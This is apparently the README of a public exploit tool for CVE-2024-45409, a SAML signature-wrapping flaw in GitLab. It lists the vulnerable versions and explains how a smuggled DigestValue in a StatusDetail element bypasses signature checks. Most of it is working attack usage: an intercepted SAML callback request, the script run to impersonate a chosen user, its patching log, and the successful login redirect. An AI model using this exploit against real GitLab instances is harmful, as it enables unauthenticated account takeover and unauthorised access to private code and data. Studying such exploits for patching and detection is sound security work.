This script exploits the CVE-2024-45409 that allows an unauthenticated attacker with access to any signed SAML document issued by the IDP to forge a SAML Response/Assertion and gain access as any user on GitLab.
All the following GitLab (CE/EE) versions are vulnerable:
- < 16.11.10
- 17.0.0 < 17.0.8
- 17.0.0 < 17.1.8
- 17.0.0 < 17.2.7
- 17.0.0 < 17.3.3
This exploit injects the DigestValue of the modified assertion into the StatusDetail element, allowing it to smuggle the XPath selector that will use this value instead of the one in the SignedInfo block.
- A valid SAML Response issued by the IDP
apt install python3-lxmlIntercept the URL and Base64-encoded IDP SAML response first, then modify the XML content using the script.
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]
SAMLResponse=PHNhbWxwOlJlc3Bv[...]$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
Digest algorithm: sha256
Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64Afterward, replace the parameter SAMLResponse value with the script output. If authentication is successful, you will be redirected to the GitLab homepage.
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]
<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>